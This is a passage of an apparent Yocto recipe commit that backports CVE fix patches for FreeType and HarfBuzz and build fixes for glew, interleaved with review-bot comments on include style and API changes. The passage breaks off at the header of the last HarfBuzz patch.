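+diff --git a/src/sfnt/sfobjs.c b/src/sfnt/sfobjs.c
+index f9d4d3858..9771c35df 100644
+--- a/src/sfnt/sfobjs.c
++++ b/src/sfnt/sfobjs.c
+@@ -566,7 +566,7 @@
+ face_index = FT_ABS( face_instance_index ) & 0xFFFF;
+
+ /* value -(N+1) requests information on index N */
+- if ( face_instance_index < 0 )
++ if ( face_instance_index < 0 && face_index > 0 )
+ face_index--;
+
+ if ( face_index >= face->ttc_header.count )
+--
+GitLab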
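--- /dev/null
+++ b/meta/recipes-graphics/freetype/freetype/CVE-2022-27405.patch
@@ -0,0 +1,38 @@
+From 22a0cccb4d9d002f33c1ba7a4b36812c7d4f46b5 Mon Sep 17 00:00:00 2001
+From: Werner Lemberg <wl@gnu.org>
+Date: Sat, 19 Mar 2022 06:40:17 +0100
+Subject: [PATCH] * src/base/ftobjs.c (ft_open_face_internal): Properly guard
+ `face_index`.
+We must ensure that the cast to `FT_Int` doesn't change the sign.
+Fixes #1139.
+
+CVE: CVE-2022-27405
+Upstream-Status: Backport [https://gitlab.freedesktop.org/freetype/freetype/-/commit/22a0cccb4d9d002f33c1ba7a4b36812c7d4f46b5]
+Comment: No Change in any hunk
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+---
+ src/base/ftobjs.c | 9 +++++++++
+ 1 file changed, 9 insertions(+)
+
+diff --git a/src/base/ftobjs.c b/src/base/ftobjs.c
+index 2c0f0e6c9..10952a6c6 100644
+--- a/src/base/ftobjs.c
++++ b/src/base/ftobjs.c
+@@ -2527,6 +2527,15 @@
+ #endif
+
+
++ /* only use lower 31 bits together with sign bit */
++ if ( face_index > 0 )
++ face_index &= 0x7FFFFFFFL;
++ else
++ {
++ face_index &= 0x7FFFFFFFL;
++ face_index = -face_index;
++ }
++
+ #ifdef FT_DEBUG_LEVEL_TRACE
+ FT_TRACE3(( "FT_Open_Face: " ));
+ if ( face_index < 0 )
+--
+GitLab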
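--- /dev/null
+++ b/meta/recipes-graphics/freetype/freetype/CVE-2022-27406.patch
@@ -0,0 +1,31 @@
+From 0c2bdb01a2e1d24a3e592377a6d0822856e10df2 Mon Sep 17 00:00:00 2001
+From: Werner Lemberg <wl@gnu.org>
+Date: Sat, 19 Mar 2022 09:37:28 +0100
+Subject: [PATCH] * src/base/ftobjs.c (FT_Request_Size): Guard `face->size`.
+
+Fixes #1140.
+
+CVE: CVE-2022-27406
+Upstream-Status: Backport [https://gitlab.freedesktop.org/freetype/freetype/-/commit/0c2bdb01a2e1d24a3e592377a6d0822856e10df2]
+Comment: No Change in any hunk
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+---
+ src/base/ftobjs.c | 3 +++
+ 1 file changed, 3 insertions(+)
+
+diff --git a/src/base/ftobjs.c b/src/base/ftobjs.c
+index 6492a1517..282c9121a 100644
+--- a/src/base/ftobjs.c
++++ b/src/base/ftobjs.c
+@@ -3409,6 +3409,9 @@
+ if ( !face )
+ return FT_THROW( Invalid_Face_Handle );
+
++ if ( !face->size )
++ return FT_THROW( Invalid_Size_Handle );
++
+ if ( !req || req->width < 0 || req->height < 0 ||
+ req->type >= FT_SIZE_REQUEST_TYPE_MAX )
+ return FT_THROW( Invalid_Argument );
+--
+GitLab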
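--- /dev/null
+++ b/meta/recipes-graphics/freetype/freetype/CVE-2023-2004.patch
@@ -0,0 +1,40 @@
+From e6fda039ad638866b7a6a5d046f03278ba1b7611 Mon Sep 17 00:00:00 2001
+From: Werner Lemberg <wl@gnu.org>
+Date: Mon, 14 Nov 2022 19:18:19 +0100
+Subject: [PATCH] * src/truetype/ttgxvar.c (tt_hvadvance_adjust): Integer
+ overflow.
+
+Reported as
+
+ https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50462
+
+Upstream-Status: Backport [https://github.com/freetype/freetype/commit/e6fda039ad638866b7a6a5d046f03278ba1b7611]
+CVE: CVE-2023-2004
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ src/truetype/ttgxvar.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/src/truetype/ttgxvar.c b/src/truetype/ttgxvar.c
+index 78d87dc..258d701 100644
+--- a/src/truetype/ttgxvar.c
++++ b/src/truetype/ttgxvar.c
+@@ -43,6 +43,7 @@
+ #include FT_INTERNAL_DEBUG_H
+ #include FT_CONFIG_CONFIG_H
+ #include FT_INTERNAL_STREAM_H
++#include <freetype/internal/ftcalc.h>
+ #include FT_INTERNAL_SFNT_H
+ #include FT_TRUETYPE_TAGS_H
+ #include FT_TRUETYPE_IDS_H
+@@ -1065,7 +1066,7 @@
+ delta == 1 ? "" : "s",
+ vertical ? "VVAR" : "HVAR" ));
+
+- *avalue += delta;
++ *avalue = ADD_INT( *avalue, delta );
+
+ Exit:
+ return error;
+--
+2.17.1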
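Review bot: The added `#include <freetype/internal/ftcalc.h>` breaks the pattern of the surrounding includes, which all go through the `FT_INTERNAL_*_H` macros; `#include FT_INTERNAL_CALC_H` pulls in the same header and stays consistent with the rest of the file. The include is presumably a backporter addition so that `ADD_INT` resolves in this older tree, since the upstream subject line mentions only `tt_hvadvance_adjust`. A `Comment:` line saying so, as the CVE-2022-27404 patch does for its dropped hunk, would make the deviation from upstream visible to an auditor.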
diff --git a/meta/recipes-graphics/freetype/freetype_2.10.1.bb b/meta/recipes-graphics/freetype/freetype_2.10.1.bb
index 2d444bbf19..6af744b981 100644
--- a/meta/recipes-graphics/freetype/freetype_2.10.1.bb
+++ b/meta/recipes-graphics/freetype/freetype_2.10.1.bb
@@ -15,6 +15,10 @@ LIC_FILES_CHKSUM = "file://docs/LICENSE.TXT;md5=4af6221506f202774ef74f64932878a1
15SRC_URI = "${SAVANNAH_NONGNU_MIRROR}/${BPN}/${BP}.tar.xz \ 15SRC_URI = "${SAVANNAH_NONGNU_MIRROR}/${BPN}/${BP}.tar.xz \
16 file://use-right-libtool.patch \ 16 file://use-right-libtool.patch \
17 file://0001-sfnt-Fix-heap-buffer-overflow-59308.patch \ 17 file://0001-sfnt-Fix-heap-buffer-overflow-59308.patch \
18 file://CVE-2022-27404.patch \
19 file://CVE-2022-27405.patch \
20 file://CVE-2022-27406.patch \
21 file://CVE-2023-2004.patch \
18 " 22 "
19SRC_URI[md5sum] = "bd42e75127f8431923679480efb5ba8f" 23SRC_URI[md5sum] = "bd42e75127f8431923679480efb5ba8f"
20SRC_URI[sha256sum] = "16dbfa488a21fe827dc27eaf708f42f7aa3bb997d745d31a19781628c36ba26f" 24SRC_URI[sha256sum] = "16dbfa488a21fe827dc27eaf708f42f7aa3bb997d745d31a19781628c36ba26f"
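--- /dev/null
+++ b/meta/recipes-graphics/glew/glew/0001-Fix-build-race-in-Makefile.patch
@@ -0,0 +1,56 @@
+Upstream-Status: Submitted [https://github.com/nigels-com/glew/pull/311]
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+From 0ce0a85597db48a2fca619bd95e34af091e54ae8 Mon Sep 17 00:00:00 2001
+From: Ross Burton <ross.burton@arm.com>
+Date: Thu, 22 Jul 2021 16:31:11 +0100
+Subject: [PATCH] Fix build race in Makefile
+
+The current rule for the binaries is:
+
+glew.bin: glew.lib bin bin/$(GLEWINFO.BIN) bin/$(VISUALINFO.BIN)
+
+In parallel builds, all of those targets happen at the same time. This
+means that 'bin' can happen *after* 'bin/$(GLEWINFO.BIN)', which is a
+problem as the 'bin' target's responsibility is to create the directory
+that the other target writes into.
+
+Solve this by not having a separate 'create directory' target which is
+fundamentally racy, and simply mkdir in each target which writes into it.
+---
+ Makefile | 9 ++++-----
+ 1 file changed, 4 insertions(+), 5 deletions(-)
+
+diff --git a/Makefile b/Makefile
+index d0e4614..04af44c 100644
+--- a/Makefile
++++ b/Makefile
+@@ -171,21 +171,20 @@ VISUALINFO.BIN.OBJ := $(VISUALINFO.BIN.OBJ:.c=.o)
+ # Don't build glewinfo or visualinfo for NaCL, yet.
+
+ ifneq ($(filter nacl%,$(SYSTEM)),)
+-glew.bin: glew.lib bin
++glew.bin: glew.lib
+ else
+-glew.bin: glew.lib bin bin/$(GLEWINFO.BIN) bin/$(VISUALINFO.BIN)
++glew.bin: glew.lib bin/$(GLEWINFO.BIN) bin/$(VISUALINFO.BIN)
+ endif
+
+-bin:
+- mkdir bin
+-
+ bin/$(GLEWINFO.BIN): $(GLEWINFO.BIN.OBJ) $(LIB.SHARED.DIR)/$(LIB.SHARED)
++ @mkdir -p $(dir $@)
+ $(CC) $(CFLAGS) -o $@ $(GLEWINFO.BIN.OBJ) $(BIN.LIBS)
+ ifneq ($(STRIP),)
+ $(STRIP) -x $@
+ endif
+
+ bin/$(VISUALINFO.BIN): $(VISUALINFO.BIN.OBJ) $(LIB.SHARED.DIR)/$(LIB.SHARED)
++ @mkdir -p $(dir $@)
+ $(CC) $(CFLAGS) -o $@ $(VISUALINFO.BIN.OBJ) $(BIN.LIBS)
+ ifneq ($(STRIP),)
+ $(STRIP) -x $@
+--
+2.25.1
+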
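--- /dev/null
+++ b/meta/recipes-graphics/glew/glew/notempdir.patch
@@ -0,0 +1,19 @@
+We don't use the dist-* targets and hence DIST_DIR isn't used. The current code
+creates a new temp directory in /tmp/ for every invocation of make. Lets
+not do that.
+
+Upstream-Status: Pending [a revised version would be needed for upstream]
+Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
+
+Index: glew-2.2.0/Makefile
+===================================================================
+--- glew-2.2.0.orig/Makefile
++++ glew-2.2.0/Makefile
+@@ -56,7 +56,6 @@ DIST_SRC_ZIP ?= $(shell pwd)/$(DIST_NAME
+ DIST_SRC_TGZ ?= $(shell pwd)/$(DIST_NAME).tgz
+ DIST_WIN32 ?= $(shell pwd)/$(DIST_NAME)-win32.zip
+
+-DIST_DIR := $(shell mktemp -d /tmp/glew.XXXXXX)/$(DIST_NAME)
+
+ # To disable stripping of linked binaries either:
+ # - use STRIP= on gmake command-line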
diff --git a/meta/recipes-graphics/glew/glew_2.2.0.bb b/meta/recipes-graphics/glew/glew_2.2.0.bb
index 8948444e08..d7a26a3438 100644
--- a/meta/recipes-graphics/glew/glew_2.2.0.bb
+++ b/meta/recipes-graphics/glew/glew_2.2.0.bb
@@ -6,6 +6,8 @@ LICENSE = "MIT"
6LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=2ac251558de685c6b9478d89be3149c2" 6LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=2ac251558de685c6b9478d89be3149c2"
7 7
8SRC_URI = "${SOURCEFORGE_MIRROR}/project/glew/glew/${PV}/glew-${PV}.tgz \ 8SRC_URI = "${SOURCEFORGE_MIRROR}/project/glew/glew/${PV}/glew-${PV}.tgz \
9 file://0001-Fix-build-race-in-Makefile.patch \
10 file://notempdir.patch \
9 file://no-strip.patch" 11 file://no-strip.patch"
10 12
11SRC_URI[md5sum] = "3579164bccaef09e36c0af7f4fd5c7c7" 13SRC_URI[md5sum] = "3579164bccaef09e36c0af7f4fd5c7c7"
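--- /dev/null
+++ b/meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193-pre0.patch
@@ -0,0 +1,335 @@
+From 3122c2cdc45a964efedad8953a2df67205c3e3a8 Mon Sep 17 00:00:00 2001
+From: Behdad Esfahbod <behdad@behdad.org>
+Date: Sat, 4 Dec 2021 19:50:33 -0800
+Subject: [PATCH] [buffer] Add HB_GLYPH_FLAG_UNSAFE_TO_CONCAT
+
+Fixes https://github.com/harfbuzz/harfbuzz/issues/1463
+Upstream-Status: Backport from [https://github.com/harfbuzz/harfbuzz/commit/3122c2cdc45a964efedad8953a2df67205c3e3a8]
+Comment1: To backport the fix for CVE-2023-25193, add defination for HB_GLYPH_FLAG_UNSAFE_TO_CONCAT. This patch is needed along with CVE-2023-25193-pre1.patch for sucessfull porting.
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ src/hb-buffer.cc | 10 ++---
+ src/hb-buffer.h | 76 ++++++++++++++++++++++++++++++------
+ src/hb-buffer.hh | 33 ++++++++++------
+ src/hb-ot-layout-gsubgpos.hh | 39 +++++++++++++++---
+ src/hb-ot-shape.cc | 8 +---
+ 5 files changed, 124 insertions(+), 42 deletions(-)
+
+diff --git a/src/hb-buffer.cc b/src/hb-buffer.cc
+index 6131c86..bba5eae 100644
+--- a/src/hb-buffer.cc
++++ b/src/hb-buffer.cc
+@@ -610,14 +610,14 @@ done:
+ }
+
+ void
+-hb_buffer_t::unsafe_to_break_impl (unsigned int start, unsigned int end)
++hb_buffer_t::unsafe_to_break_impl (unsigned int start, unsigned int end, hb_mask_t mask)
+ {
+ unsigned int cluster = (unsigned int) -1;
+ cluster = _unsafe_to_break_find_min_cluster (info, start, end, cluster);
+- _unsafe_to_break_set_mask (info, start, end, cluster);
++ _unsafe_to_break_set_mask (info, start, end, cluster, mask);
+ }
+ void
+-hb_buffer_t::unsafe_to_break_from_outbuffer (unsigned int start, unsigned int end)
++hb_buffer_t::unsafe_to_break_from_outbuffer (unsigned int start, unsigned int end, hb_mask_t mask)
+ {
+ if (!have_output)
+ {
+@@ -631,8 +631,8 @@ hb_buffer_t::unsafe_to_break_from_outbuffer (unsigned int start, unsigned int en
+ unsigned int cluster = (unsigned int) -1;
+ cluster = _unsafe_to_break_find_min_cluster (out_info, start, out_len, cluster);
+ cluster = _unsafe_to_break_find_min_cluster (info, idx, end, cluster);
+- _unsafe_to_break_set_mask (out_info, start, out_len, cluster);
+- _unsafe_to_break_set_mask (info, idx, end, cluster);
++ _unsafe_to_break_set_mask (out_info, start, out_len, cluster, mask);
++ _unsafe_to_break_set_mask (info, idx, end, cluster, mask);
+ }
+
+ void
+diff --git a/src/hb-buffer.h b/src/hb-buffer.h
+index d5cb746..42dc92a 100644
+--- a/src/hb-buffer.h
++++ b/src/hb-buffer.h
+@@ -77,26 +77,76 @@ typedef struct hb_glyph_info_t
+ * @HB_GLYPH_FLAG_UNSAFE_TO_BREAK: Indicates that if input text is broken at the
+ * beginning of the cluster this glyph is part of,
+ * then both sides need to be re-shaped, as the
+- * result might be different. On the flip side,
+- * it means that when this flag is not present,
+- * then it's safe to break the glyph-run at the
+- * beginning of this cluster, and the two sides
+- * represent the exact same result one would get
+- * if breaking input text at the beginning of
+- * this cluster and shaping the two sides
+- * separately. This can be used to optimize
+- * paragraph layout, by avoiding re-shaping
+- * of each line after line-breaking, or limiting
+- * the reshaping to a small piece around the
+- * breaking point only.
++ * result might be different.
++ *
++ * On the flip side, it means that when this
++ * flag is not present, then it is safe to break
++ * the glyph-run at the beginning of this
++ * cluster, and the two sides will represent the
++ * exact same result one would get if breaking
++ * input text at the beginning of this cluster
++ * and shaping the two sides separately.
++ *
++ * This can be used to optimize paragraph
++ * layout, by avoiding re-shaping of each line
++ * after line-breaking.
++ *
++ * @HB_GLYPH_FLAG_UNSAFE_TO_CONCAT: Indicates that if input text is changed on one
++ * side of the beginning of the cluster this glyph
++ * is part of, then the shaping results for the
++ * other side might change.
++ *
++ * Note that the absence of this flag will NOT by
++ * itself mean that it IS safe to concat text.
++ * Only two pieces of text both of which clear of
++ * this flag can be concatenated safely.
++ *
++ * This can be used to optimize paragraph
++ * layout, by avoiding re-shaping of each line
++ * after line-breaking, by limiting the
++ * reshaping to a small piece around the
++ * breaking positin only, even if the breaking
++ * position carries the
++ * #HB_GLYPH_FLAG_UNSAFE_TO_BREAK or when
++ * hyphenation or other text transformation
++ * happens at line-break position, in the following
++ * way:
++ *
++ * 1. Iterate back from the line-break position till
++ * the the first cluster start position that is
++ * NOT unsafe-to-concat, 2. shape the segment from
++ * there till the end of line, 3. check whether the
++ * resulting glyph-run also is clear of the
++ * unsafe-to-concat at its start-of-text position;
++ * if it is, just splice it into place and the line
++ * is shaped; If not, move on to a position further
++ * back that is clear of unsafe-to-concat and retry
++ * from there, and repeat.
++ *
++ * At the start of next line a similar algorithm can
++ * be implemented. A slight complication will arise,
++ * because while our buffer API has a way to
++ * return flags for position corresponding to
++ * start-of-text, there is currently no position
++ * corresponding to end-of-text. This limitation
++ * can be alleviated by shaping more text than needed
++ * and looking for unsafe-to-concat flag within text
++ * clusters.
++ *
++ * The #HB_GLYPH_FLAG_UNSAFE_TO_BREAK flag will
++ * always imply this flag.
++ *
++ * Since: REPLACEME
++ *
+ * @HB_GLYPH_FLAG_DEFINED: All the currently defined flags.
+ *
+ * Since: 1.5.0
+ */
+ typedef enum { /*< flags >*/
+ HB_GLYPH_FLAG_UNSAFE_TO_BREAK = 0x00000001,
++ HB_GLYPH_FLAG_UNSAFE_TO_CONCAT = 0x00000002,
+
+- HB_GLYPH_FLAG_DEFINED = 0x00000001 /* OR of all defined flags */
++ HB_GLYPH_FLAG_DEFINED = 0x00000003 /* OR of all defined flags */
+ } hb_glyph_flags_t;
+
+ HB_EXTERN hb_glyph_flags_t
+diff --git a/src/hb-buffer.hh b/src/hb-buffer.hh
+index b5596d9..beac7b6 100644
+--- a/src/hb-buffer.hh
++++ b/src/hb-buffer.hh
+@@ -67,8 +67,8 @@ enum hb_buffer_scratch_flags_t {
+ HB_BUFFER_SCRATCH_FLAG_HAS_DEFAULT_IGNORABLES = 0x00000002u,
+ HB_BUFFER_SCRATCH_FLAG_HAS_SPACE_FALLBACK = 0x00000004u,
+ HB_BUFFER_SCRATCH_FLAG_HAS_GPOS_ATTACHMENT = 0x00000008u,
+- HB_BUFFER_SCRATCH_FLAG_HAS_UNSAFE_TO_BREAK = 0x00000010u,
+- HB_BUFFER_SCRATCH_FLAG_HAS_CGJ = 0x00000020u,
++ HB_BUFFER_SCRATCH_FLAG_HAS_CGJ = 0x00000010u,
++ HB_BUFFER_SCRATCH_FLAG_HAS_GLYPH_FLAGS = 0x00000020u,
+
+ /* Reserved for complex shapers' internal use. */
+ HB_BUFFER_SCRATCH_FLAG_COMPLEX0 = 0x01000000u,
+@@ -324,8 +324,19 @@ struct hb_buffer_t
+ return;
+ unsafe_to_break_impl (start, end);
+ }
+- HB_INTERNAL void unsafe_to_break_impl (unsigned int start, unsigned int end);
+- HB_INTERNAL void unsafe_to_break_from_outbuffer (unsigned int start, unsigned int end);
++ void unsafe_to_concat (unsigned int start,
++ unsigned int end)
++ {
++ if (end - start < 2)
++ return;
++ unsafe_to_break_impl (start, end, HB_GLYPH_FLAG_UNSAFE_TO_CONCAT);
++ }
++ HB_INTERNAL void unsafe_to_break_impl (unsigned int start, unsigned int end,
++ hb_mask_t mask = HB_GLYPH_FLAG_UNSAFE_TO_BREAK | HB_GLYPH_FLAG_UNSAFE_TO_CONCAT);
++ HB_INTERNAL void unsafe_to_break_from_outbuffer (unsigned int start, unsigned int end,
++ hb_mask_t mask = HB_GLYPH_FLAG_UNSAFE_TO_BREAK | HB_GLYPH_FLAG_UNSAFE_TO_CONCAT);
++ void unsafe_to_concat_from_outbuffer (unsigned int start, unsigned int end)
++ { unsafe_to_break_from_outbuffer (start, end, HB_GLYPH_FLAG_UNSAFE_TO_CONCAT); }
+
+
+ /* Internal methods */
+@@ -377,12 +388,7 @@ struct hb_buffer_t
+ set_cluster (hb_glyph_info_t &inf, unsigned int cluster, unsigned int mask = 0)
+ {
+ if (inf.cluster != cluster)
+- {
+- if (mask & HB_GLYPH_FLAG_UNSAFE_TO_BREAK)
+- inf.mask |= HB_GLYPH_FLAG_UNSAFE_TO_BREAK;
+- else
+- inf.mask &= ~HB_GLYPH_FLAG_UNSAFE_TO_BREAK;
+- }
++ inf.mask = (inf.mask & ~HB_GLYPH_FLAG_DEFINED) | (mask & HB_GLYPH_FLAG_DEFINED);
+ inf.cluster = cluster;
+ }
+
+@@ -398,13 +404,14 @@ struct hb_buffer_t
+ void
+ _unsafe_to_break_set_mask (hb_glyph_info_t *infos,
+ unsigned int start, unsigned int end,
+- unsigned int cluster)
++ unsigned int cluster,
++ hb_mask_t mask)
+ {
+ for (unsigned int i = start; i < end; i++)
+ if (cluster != infos[i].cluster)
+ {
+- scratch_flags |= HB_BUFFER_SCRATCH_FLAG_HAS_UNSAFE_TO_BREAK;
+- infos[i].mask |= HB_GLYPH_FLAG_UNSAFE_TO_BREAK;
++ scratch_flags |= HB_BUFFER_SCRATCH_FLAG_HAS_GLYPH_FLAGS;
++ infos[i].mask |= mask;
+ }
+ }
+
+diff --git a/src/hb-ot-layout-gsubgpos.hh b/src/hb-ot-layout-gsubgpos.hh
+index 579d178..a6ca456 100644
+--- a/src/hb-ot-layout-gsubgpos.hh
++++ b/src/hb-ot-layout-gsubgpos.hh
+@@ -369,7 +369,7 @@ struct hb_ot_apply_context_t :
+ may_skip (const hb_glyph_info_t &info) const
+ { return matcher.may_skip (c, info); }
+
+- bool next ()
++ bool next (unsigned *unsafe_to = nullptr)
+ {
+ assert (num_items > 0);
+ while (idx + num_items < end)
+@@ -392,11 +392,17 @@ struct hb_ot_apply_context_t :
+ }
+
+ if (skip == matcher_t::SKIP_NO)
++ {
++ if (unsafe_to)
++ *unsafe_to = idx + 1;
+ return false;
++ }
+ }
++ if (unsafe_to)
++ *unsafe_to = end;
+ return false;
+ }
+- bool prev ()
++ bool prev (unsigned *unsafe_from = nullptr)
+ {
+ assert (num_items > 0);
+ while (idx > num_items - 1)
+@@ -419,8 +425,14 @@ struct hb_ot_apply_context_t :
+ }
+
+ if (skip == matcher_t::SKIP_NO)
++ {
++ if (unsafe_from)
++ *unsafe_from = hb_max (1u, idx) - 1u;
+ return false;
++ }
+ }
++ if (unsafe_from)
++ *unsafe_from = 0;
+ return false;
+ }
+
+@@ -834,7 +846,12 @@ static inline bool match_input (hb_ot_apply_context_t *c,
+ match_positions[0] = buffer->idx;
+ for (unsigned int i = 1; i < count; i++)
+ {
+- if (!skippy_iter.next ()) return_trace (false);
++ unsigned unsafe_to;
++ if (!skippy_iter.next (&unsafe_to))
++ {
++ c->buffer->unsafe_to_concat (c->buffer->idx, unsafe_to);
++ return_trace (false);
++ }
+
+ match_positions[i] = skippy_iter.idx;
+
+@@ -1022,8 +1039,14 @@ static inline bool match_backtrack (hb_ot_apply_context_t *c,
+ skippy_iter.set_match_func (match_func, match_data, backtrack);
+
+ for (unsigned int i = 0; i < count; i++)
+- if (!skippy_iter.prev ())
++ {
++ unsigned unsafe_from;
++ if (!skippy_iter.prev (&unsafe_from))
++ {
++ c->buffer->unsafe_to_concat_from_outbuffer (unsafe_from, c->buffer->idx);
+ return_trace (false);
++ }
++ }
+
+ *match_start = skippy_iter.idx;
+
+@@ -1045,8 +1068,14 @@ static inline bool match_lookahead (hb_ot_apply_context_t *c,
+ skippy_iter.set_match_func (match_func, match_data, lookahead);
+
+ for (unsigned int i = 0; i < count; i++)
+- if (!skippy_iter.next ())
++ {
++ unsigned unsafe_to;
++ if (!skippy_iter.next (&unsafe_to))
++ {
++ c->buffer->unsafe_to_concat (c->buffer->idx + offset, unsafe_to);
+ return_trace (false);
++ }
++ }
+
+ *end_index = skippy_iter.idx + 1;
+
+diff --git a/src/hb-ot-shape.cc b/src/hb-ot-shape.cc
+index 5d9a70c..5d10b30 100644
+--- a/src/hb-ot-shape.cc
++++ b/src/hb-ot-shape.cc
+@@ -1008,7 +1008,7 @@ hb_propagate_flags (hb_buffer_t *buffer)
+ /* Propagate cluster-level glyph flags to be the same on all cluster glyphs.
+ * Simplifies using them. */
+
+- if (!(buffer->scratch_flags & HB_BUFFER_SCRATCH_FLAG_HAS_UNSAFE_TO_BREAK))
++ if (!(buffer->scratch_flags & HB_BUFFER_SCRATCH_FLAG_HAS_GLYPH_FLAGS))
+ return;
+
+ hb_glyph_info_t *info = buffer->info;
+@@ -1017,11 +1017,7 @@ hb_propagate_flags (hb_buffer_t *buffer)
+ {
+ unsigned int mask = 0;
+ for (unsigned int i = start; i < end; i++)
+- if (info[i].mask & HB_GLYPH_FLAG_UNSAFE_TO_BREAK)
+- {
+- mask = HB_GLYPH_FLAG_UNSAFE_TO_BREAK;
+- break;
+- }
++ mask |= info[i].mask & HB_GLYPH_FLAG_DEFINED;
+ if (mask)
+ for (unsigned int i = start; i < end; i++)
+ info[i].mask |= mask;
+--
+2.25.1
+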
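Review bot: The enum block in `src/hb-buffer.h` changes the public glyph-flag contract on a stable branch, and the patch header does not say so: `HB_GLYPH_FLAG_UNSAFE_TO_CONCAT = 0x00000002` is added and `HB_GLYPH_FLAG_DEFINED` widens from `0x00000001` to `0x00000003`, while `set_cluster` and `hb_propagate_flags` now carry every defined bit. Callers that treat any non-zero glyph flag as unsafe-to-break, rather than masking with `HB_GLYPH_FLAG_UNSAFE_TO_BREAK`, would presumably see more clusters flagged after this backport. I would record that in the header, for example `Comment2: Adds public flag HB_GLYPH_FLAG_UNSAFE_TO_CONCAT (0x2); HB_GLYPH_FLAG_DEFINED becomes 0x3.` The doc comment also still carries the upstream placeholder `Since: REPLACEME`, which is worth a mention in the same header line so it is not mistaken for a release number.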
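--- /dev/null
+++ b/meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193-pre1.patch
@@ -0,0 +1,135 @@
+From b29fbd16fa82b82bdf0dcb2f13a63f7dc23cf324 Mon Sep 17 00:00:00 2001
+From: Behdad Esfahbod <behdad@behdad.org>
+Date: Mon, 6 Feb 2023 13:08:52 -0700
+Subject: [PATCH] [gsubgpos] Refactor skippy_iter.match()
+
+Upstream-Status: Backport from [https://github.com/harfbuzz/harfbuzz/commit/b29fbd16fa82b82bdf0dcb2f13a63f7dc23cf324]
+Comment1: To backport the fix for CVE-2023-25193, add defination for MATCH, NOT_MATCH and SKIP.
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ src/hb-ot-layout-gsubgpos.hh | 94 +++++++++++++++++++++---------------
+ 1 file changed, 54 insertions(+), 40 deletions(-)
+
+diff --git a/src/hb-ot-layout-gsubgpos.hh b/src/hb-ot-layout-gsubgpos.hh
+index a6ca456..5a7e564 100644
+--- a/src/hb-ot-layout-gsubgpos.hh
++++ b/src/hb-ot-layout-gsubgpos.hh
+@@ -369,33 +369,52 @@ struct hb_ot_apply_context_t :
+ may_skip (const hb_glyph_info_t &info) const
+ { return matcher.may_skip (c, info); }
+
++ enum match_t {
++ MATCH,
++ NOT_MATCH,
++ SKIP
++ };
++
++ match_t match (hb_glyph_info_t &info)
++ {
++ matcher_t::may_skip_t skip = matcher.may_skip (c, info);
++ if (unlikely (skip == matcher_t::SKIP_YES))
++ return SKIP;
++
++ matcher_t::may_match_t match = matcher.may_match (info, match_glyph_data);
++ if (match == matcher_t::MATCH_YES ||
++ (match == matcher_t::MATCH_MAYBE &&
++ skip == matcher_t::SKIP_NO))
++ return MATCH;
++
++ if (skip == matcher_t::SKIP_NO)
++ return NOT_MATCH;
++
++ return SKIP;
++ }
++
+ bool next (unsigned *unsafe_to = nullptr)
+ {
+ assert (num_items > 0);
+ while (idx + num_items < end)
+ {
+ idx++;
+- const hb_glyph_info_t &info = c->buffer->info[idx];
+-
+- matcher_t::may_skip_t skip = matcher.may_skip (c, info);
+- if (unlikely (skip == matcher_t::SKIP_YES))
+- continue;
+-
+- matcher_t::may_match_t match = matcher.may_match (info, match_glyph_data);
+- if (match == matcher_t::MATCH_YES ||
+- (match == matcher_t::MATCH_MAYBE &&
+- skip == matcher_t::SKIP_NO))
+- {
+- num_items--;
+- if (match_glyph_data) match_glyph_data++;
+- return true;
+- }
+-
+- if (skip == matcher_t::SKIP_NO)
++ switch (match (c->buffer->info[idx]))
+ {
+- if (unsafe_to)
+- *unsafe_to = idx + 1;
+- return false;
++ case MATCH:
++ {
++ num_items--;
++ if (match_glyph_data) match_glyph_data++;
++ return true;
++ }
++ case NOT_MATCH:
++ {
++ if (unsafe_to)
++ *unsafe_to = idx + 1;
++ return false;
++ }
++ case SKIP:
++ continue;
+ }
+ }
+ if (unsafe_to)
+@@ -408,27 +427,22 @@ struct hb_ot_apply_context_t :
+ while (idx > num_items - 1)
+ {
+ idx--;
+- const hb_glyph_info_t &info = c->buffer->out_info[idx];
+-
+- matcher_t::may_skip_t skip = matcher.may_skip (c, info);
+- if (unlikely (skip == matcher_t::SKIP_YES))
+- continue;
+-
+- matcher_t::may_match_t match = matcher.may_match (info, match_glyph_data);
+- if (match == matcher_t::MATCH_YES ||
+- (match == matcher_t::MATCH_MAYBE &&
+- skip == matcher_t::SKIP_NO))
++ switch (match (c->buffer->out_info[idx]))
+ {
+- num_items--;
+- if (match_glyph_data) match_glyph_data++;
+- return true;
+- }
+-
+- if (skip == matcher_t::SKIP_NO)
+- {
+- if (unsafe_from)
+- *unsafe_from = hb_max (1u, idx) - 1u;
+- return false;
++ case MATCH:
++ {
++ num_items--;
++ if (match_glyph_data) match_glyph_data++;
++ return true;
++ }
++ case NOT_MATCH:
++ {
++ if (unsafe_from)
++ *unsafe_from = hb_max (1u, idx) - 1u;
++ return false;
++ }
++ case SKIP:
++ continue;
+ }
+ }
+ if (unsafe_from)
+--
+2.25.1
+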
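Review bot: `match_t match (hb_glyph_info_t &info)` takes a mutable reference although it only reads the glyph: the code it replaces in `next()` and `prev()` bound `const hb_glyph_info_t &info` and passed it to the same `may_skip` and `may_match` calls. Declaring it `match_t match (const hb_glyph_info_t &info)` would keep the read-only contract the old loops had. A short comment on the enum would also help, since `SKIP` is returned both for `SKIP_YES` and for a non-match on a glyph that is only maybe-skippable: `/* MATCH: accept; NOT_MATCH: stop the search; SKIP: ignore this glyph and continue */`. If the backport has to stay identical to upstream, this is better raised there than changed locally.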
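--- /dev/null
+++ b/meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193.patch
@@ -0,0 +1,179 @@
+From 9c8e972dbecda93546038d24444d8216397d75a3 Mon Sep 17 00:00:00 2001
+From: Behdad Esfahbod <behdad@behdad.org>
+Date: Mon, 6 Feb 2023 14:51:25 -0700
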